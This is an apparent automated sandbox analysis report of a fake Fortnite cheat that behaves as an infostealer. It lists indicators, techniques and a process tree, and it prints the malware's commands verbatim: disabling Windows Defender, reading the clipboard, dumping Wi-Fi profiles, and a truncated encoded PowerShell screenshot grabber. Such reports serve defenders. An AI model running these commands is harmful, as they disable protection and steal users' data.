5bcbe8e955b1d71ded207e940976cca6d60eff7b9aa59fb5aefe04a872a5cd37

Analysis

max time kernel
106s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
15/04/2025, 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FortniteCheatMaster.exe
Size

8.5MB
MD5

9769298568690621dfd37bbc623a32bf
SHA1

5563e72e00472ca5f0c8f6e895bfda888c22adfd
SHA256

5bcbe8e955b1d71ded207e940976cca6d60eff7b9aa59fb5aefe04a872a5cd37
SHA512

2bb6312c00916e4e4602b3560567be789c8a976759432059320c94ca9cfa142c7d63f598a65debff7081d2482511d16655d1b369f3c21e1e56caab524801e45b
SSDEEP

196608:UWLINTwhLvsqwfI9jUCzi4H1qSiXLGVi7DMgpZrk0ax88QsVMwICEc/jx:vL05IHziK1piXLGVE4UXaxgsVJt

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3268	powershell.exe
2712	powershell.exe
1500	powershell.exe
5060	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	FortniteCheatMaster.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5164	cmd.exe
3620	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1472	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe
4164	FortniteCheatMaster.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	discord.com
30	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
27	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2004	tasklist.exe
532	tasklist.exe
3192	tasklist.exe
2056	tasklist.exe
3556	tasklist.exe

UPX packed file 52 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000240ac-66.dat	upx
behavioral1/memory/4164-70-0x00007FFEA0F00000-0x00007FFEA1563000-memory.dmp	upx
behavioral1/files/0x0007000000024075-73.dat	upx
behavioral1/memory/4164-75-0x00007FFEB5530000-0x00007FFEB5557000-memory.dmp	upx
behavioral1/files/0x0007000000024077-129.dat	upx
behavioral1/memory/4164-130-0x00007FFEB8F30000-0x00007FFEB8F3F000-memory.dmp	upx
behavioral1/memory/4164-131-0x00007FFEB6260000-0x00007FFEB6279000-memory.dmp	upx
behavioral1/memory/4164-132-0x00007FFEB5500000-0x00007FFEB552B000-memory.dmp	upx
behavioral1/files/0x0007000000024076-128.dat	upx
behavioral1/files/0x0007000000024074-127.dat	upx
behavioral1/files/0x00070000000240b2-126.dat	upx
behavioral1/files/0x00070000000240b0-125.dat	upx
behavioral1/files/0x00070000000240af-124.dat	upx
behavioral1/files/0x00070000000240ab-121.dat	upx
behavioral1/files/0x00070000000240a9-120.dat	upx
behavioral1/files/0x00070000000240aa-76.dat	upx
behavioral1/memory/4164-137-0x00007FFEB0100000-0x00007FFEB0125000-memory.dmp	upx
behavioral1/memory/4164-138-0x00007FFEA1660000-0x00007FFEA17DF000-memory.dmp	upx
behavioral1/memory/4164-139-0x00007FFEB55C0000-0x00007FFEB55D9000-memory.dmp	upx
behavioral1/memory/4164-140-0x00007FFEB8200000-0x00007FFEB820D000-memory.dmp	upx
behavioral1/memory/4164-142-0x00007FFEA0F00000-0x00007FFEA1563000-memory.dmp	upx
behavioral1/memory/4164-143-0x00007FFEA1590000-0x00007FFEA165E000-memory.dmp	upx
behavioral1/memory/4164-144-0x00007FFEA09C0000-0x00007FFEA0EF3000-memory.dmp	upx
behavioral1/memory/4164-141-0x00007FFEB00C0000-0x00007FFEB00F4000-memory.dmp	upx
behavioral1/memory/4164-146-0x00007FFEB5530000-0x00007FFEB5557000-memory.dmp	upx
behavioral1/memory/4164-147-0x00007FFEB16E0000-0x00007FFEB16F4000-memory.dmp	upx
behavioral1/memory/4164-148-0x00007FFEB3D40000-0x00007FFEB3D4D000-memory.dmp	upx
behavioral1/memory/4164-149-0x00007FFEA0360000-0x00007FFEA0413000-memory.dmp	upx
behavioral1/memory/4164-173-0x00007FFEB0100000-0x00007FFEB0125000-memory.dmp	upx
behavioral1/memory/4164-174-0x00007FFEA1660000-0x00007FFEA17DF000-memory.dmp	upx
behavioral1/memory/4164-290-0x00007FFEB55C0000-0x00007FFEB55D9000-memory.dmp	upx
behavioral1/memory/4164-345-0x00007FFEB00C0000-0x00007FFEB00F4000-memory.dmp	upx
behavioral1/memory/4164-373-0x00007FFEA1590000-0x00007FFEA165E000-memory.dmp	upx
behavioral1/memory/4164-374-0x00007FFEA09C0000-0x00007FFEA0EF3000-memory.dmp	upx
behavioral1/memory/4164-377-0x00007FFEA0F00000-0x00007FFEA1563000-memory.dmp	upx
behavioral1/memory/4164-391-0x00007FFEA0360000-0x00007FFEA0413000-memory.dmp	upx
behavioral1/memory/4164-383-0x00007FFEA1660000-0x00007FFEA17DF000-memory.dmp	upx
behavioral1/memory/4164-436-0x00007FFEB00C0000-0x00007FFEB00F4000-memory.dmp	upx
behavioral1/memory/4164-437-0x00007FFEA09C0000-0x00007FFEA0EF3000-memory.dmp	upx
behavioral1/memory/4164-435-0x00007FFEA1590000-0x00007FFEA165E000-memory.dmp	upx
behavioral1/memory/4164-434-0x00007FFEB8200000-0x00007FFEB820D000-memory.dmp	upx
behavioral1/memory/4164-433-0x00007FFEB55C0000-0x00007FFEB55D9000-memory.dmp	upx
behavioral1/memory/4164-432-0x00007FFEA1660000-0x00007FFEA17DF000-memory.dmp	upx
behavioral1/memory/4164-431-0x00007FFEB0100000-0x00007FFEB0125000-memory.dmp	upx
behavioral1/memory/4164-430-0x00007FFEB5500000-0x00007FFEB552B000-memory.dmp	upx
behavioral1/memory/4164-429-0x00007FFEB6260000-0x00007FFEB6279000-memory.dmp	upx
behavioral1/memory/4164-428-0x00007FFEB8F30000-0x00007FFEB8F3F000-memory.dmp	upx
behavioral1/memory/4164-427-0x00007FFEB5530000-0x00007FFEB5557000-memory.dmp	upx
behavioral1/memory/4164-426-0x00007FFEA0360000-0x00007FFEA0413000-memory.dmp	upx
behavioral1/memory/4164-425-0x00007FFEB3D40000-0x00007FFEB3D4D000-memory.dmp	upx
behavioral1/memory/4164-424-0x00007FFEB16E0000-0x00007FFEB16F4000-memory.dmp	upx
behavioral1/memory/4164-412-0x00007FFEA0F00000-0x00007FFEA1563000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1064	cmd.exe
2668	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3504	WMIC.exe
3964	WMIC.exe
1772	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2776	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3268	powershell.exe
3268	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
3268	powershell.exe
3620	powershell.exe
3620	powershell.exe
2440	powershell.exe
2440	powershell.exe
3620	powershell.exe
2440	powershell.exe
2712	powershell.exe
2712	powershell.exe
5316	powershell.exe
5316	powershell.exe
5316	powershell.exe
1500	powershell.exe
1500	powershell.exe
2556	powershell.exe
2556	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3684	WMIC.exe
Token: SeSecurityPrivilege	3684	WMIC.exe
Token: SeTakeOwnershipPrivilege	3684	WMIC.exe
Token: SeLoadDriverPrivilege	3684	WMIC.exe
Token: SeSystemProfilePrivilege	3684	WMIC.exe
Token: SeSystemtimePrivilege	3684	WMIC.exe
Token: SeProfSingleProcessPrivilege	3684	WMIC.exe
Token: SeIncBasePriorityPrivilege	3684	WMIC.exe
Token: SeCreatePagefilePrivilege	3684	WMIC.exe
Token: SeBackupPrivilege	3684	WMIC.exe
Token: SeRestorePrivilege	3684	WMIC.exe
Token: SeShutdownPrivilege	3684	WMIC.exe
Token: SeDebugPrivilege	3684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3684	WMIC.exe
Token: SeRemoteShutdownPrivilege	3684	WMIC.exe
Token: SeUndockPrivilege	3684	WMIC.exe
Token: SeManageVolumePrivilege	3684	WMIC.exe
Token: 33	3684	WMIC.exe
Token: 34	3684	WMIC.exe
Token: 35	3684	WMIC.exe
Token: 36	3684	WMIC.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeIncreaseQuotaPrivilege	3684	WMIC.exe
Token: SeSecurityPrivilege	3684	WMIC.exe
Token: SeTakeOwnershipPrivilege	3684	WMIC.exe
Token: SeLoadDriverPrivilege	3684	WMIC.exe
Token: SeSystemProfilePrivilege	3684	WMIC.exe
Token: SeSystemtimePrivilege	3684	WMIC.exe
Token: SeProfSingleProcessPrivilege	3684	WMIC.exe
Token: SeIncBasePriorityPrivilege	3684	WMIC.exe
Token: SeCreatePagefilePrivilege	3684	WMIC.exe
Token: SeBackupPrivilege	3684	WMIC.exe
Token: SeRestorePrivilege	3684	WMIC.exe
Token: SeShutdownPrivilege	3684	WMIC.exe
Token: SeDebugPrivilege	3684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3684	WMIC.exe
Token: SeRemoteShutdownPrivilege	3684	WMIC.exe
Token: SeUndockPrivilege	3684	WMIC.exe
Token: SeManageVolumePrivilege	3684	WMIC.exe
Token: 33	3684	WMIC.exe
Token: 34	3684	WMIC.exe
Token: 35	3684	WMIC.exe
Token: 36	3684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3504	WMIC.exe
Token: SeSecurityPrivilege	3504	WMIC.exe
Token: SeTakeOwnershipPrivilege	3504	WMIC.exe
Token: SeLoadDriverPrivilege	3504	WMIC.exe
Token: SeSystemProfilePrivilege	3504	WMIC.exe
Token: SeSystemtimePrivilege	3504	WMIC.exe
Token: SeProfSingleProcessPrivilege	3504	WMIC.exe
Token: SeIncBasePriorityPrivilege	3504	WMIC.exe
Token: SeCreatePagefilePrivilege	3504	WMIC.exe
Token: SeBackupPrivilege	3504	WMIC.exe
Token: SeRestorePrivilege	3504	WMIC.exe
Token: SeShutdownPrivilege	3504	WMIC.exe
Token: SeDebugPrivilege	3504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3504	WMIC.exe
Token: SeRemoteShutdownPrivilege	3504	WMIC.exe
Token: SeUndockPrivilege	3504	WMIC.exe
Token: SeManageVolumePrivilege	3504	WMIC.exe
Token: 33	3504	WMIC.exe
Token: 34	3504	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5500 wrote to memory of 4164	5500	FortniteCheatMaster.exe	85
PID 5500 wrote to memory of 4164	5500	FortniteCheatMaster.exe	85
PID 4164 wrote to memory of 5080	4164	FortniteCheatMaster.exe	89
PID 4164 wrote to memory of 5080	4164	FortniteCheatMaster.exe	89
PID 4164 wrote to memory of 3508	4164	FortniteCheatMaster.exe	90
PID 4164 wrote to memory of 3508	4164	FortniteCheatMaster.exe	90
PID 4164 wrote to memory of 2340	4164	FortniteCheatMaster.exe	91
PID 4164 wrote to memory of 2340	4164	FortniteCheatMaster.exe	91
PID 4164 wrote to memory of 396	4164	FortniteCheatMaster.exe	95
PID 4164 wrote to memory of 396	4164	FortniteCheatMaster.exe	95
PID 4164 wrote to memory of 4040	4164	FortniteCheatMaster.exe	97
PID 4164 wrote to memory of 4040	4164	FortniteCheatMaster.exe	97
PID 2340 wrote to memory of 5472	2340	cmd.exe	99
PID 2340 wrote to memory of 5472	2340	cmd.exe	99
PID 4040 wrote to memory of 3684	4040	cmd.exe	100
PID 4040 wrote to memory of 3684	4040	cmd.exe	100
PID 396 wrote to memory of 2004	396	cmd.exe	101
PID 396 wrote to memory of 2004	396	cmd.exe	101
PID 3508 wrote to memory of 3268	3508	cmd.exe	102
PID 3508 wrote to memory of 3268	3508	cmd.exe	102
PID 5080 wrote to memory of 5060	5080	cmd.exe	103
PID 5080 wrote to memory of 5060	5080	cmd.exe	103
PID 4164 wrote to memory of 2444	4164	FortniteCheatMaster.exe	105
PID 4164 wrote to memory of 2444	4164	FortniteCheatMaster.exe	105
PID 2444 wrote to memory of 1028	2444	cmd.exe	107
PID 2444 wrote to memory of 1028	2444	cmd.exe	107
PID 4164 wrote to memory of 3568	4164	FortniteCheatMaster.exe	108
PID 4164 wrote to memory of 3568	4164	FortniteCheatMaster.exe	108
PID 3568 wrote to memory of 4036	3568	cmd.exe	170
PID 3568 wrote to memory of 4036	3568	cmd.exe	170
PID 4164 wrote to memory of 3248	4164	FortniteCheatMaster.exe	111
PID 4164 wrote to memory of 3248	4164	FortniteCheatMaster.exe	111
PID 3248 wrote to memory of 3504	3248	cmd.exe	113
PID 3248 wrote to memory of 3504	3248	cmd.exe	113
PID 4164 wrote to memory of 2536	4164	FortniteCheatMaster.exe	115
PID 4164 wrote to memory of 2536	4164	FortniteCheatMaster.exe	115
PID 2536 wrote to memory of 3964	2536	cmd.exe	117
PID 2536 wrote to memory of 3964	2536	cmd.exe	117
PID 4164 wrote to memory of 6024	4164	FortniteCheatMaster.exe	118
PID 4164 wrote to memory of 6024	4164	FortniteCheatMaster.exe	118
PID 4164 wrote to memory of 5532	4164	FortniteCheatMaster.exe	119
PID 4164 wrote to memory of 5532	4164	FortniteCheatMaster.exe	119
PID 6024 wrote to memory of 532	6024	cmd.exe	122
PID 6024 wrote to memory of 532	6024	cmd.exe	122
PID 5532 wrote to memory of 3192	5532	cmd.exe	123
PID 5532 wrote to memory of 3192	5532	cmd.exe	123
PID 4164 wrote to memory of 5164	4164	FortniteCheatMaster.exe	124
PID 4164 wrote to memory of 5164	4164	FortniteCheatMaster.exe	124
PID 4164 wrote to memory of 2228	4164	FortniteCheatMaster.exe	125
PID 4164 wrote to memory of 2228	4164	FortniteCheatMaster.exe	125
PID 4164 wrote to memory of 5412	4164	FortniteCheatMaster.exe	127
PID 4164 wrote to memory of 5412	4164	FortniteCheatMaster.exe	127
PID 4164 wrote to memory of 5636	4164	FortniteCheatMaster.exe	129
PID 4164 wrote to memory of 5636	4164	FortniteCheatMaster.exe	129
PID 4164 wrote to memory of 1064	4164	FortniteCheatMaster.exe	131
PID 4164 wrote to memory of 1064	4164	FortniteCheatMaster.exe	131
PID 4164 wrote to memory of 1044	4164	FortniteCheatMaster.exe	135
PID 4164 wrote to memory of 1044	4164	FortniteCheatMaster.exe	135
PID 4164 wrote to memory of 880	4164	FortniteCheatMaster.exe	134
PID 4164 wrote to memory of 880	4164	FortniteCheatMaster.exe	134
PID 5164 wrote to memory of 3620	5164	cmd.exe	138
PID 5164 wrote to memory of 3620	5164	cmd.exe	138
PID 4164 wrote to memory of 4556	4164	FortniteCheatMaster.exe	139
PID 4164 wrote to memory of 4556	4164	FortniteCheatMaster.exe	139

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4316	attrib.exe
1732	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe
"C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5500
- C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe
  "C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FortniteCheatMaster.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error en iniciar el ejecutador de Fortnite, pruebe otra vez.', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error en iniciar el ejecutador de Fortnite, pruebe otra vez.', 0, 'Error', 0+16);close()"
      4⤵
      PID:5472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5532
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2228
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1064
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:880
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1044
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAg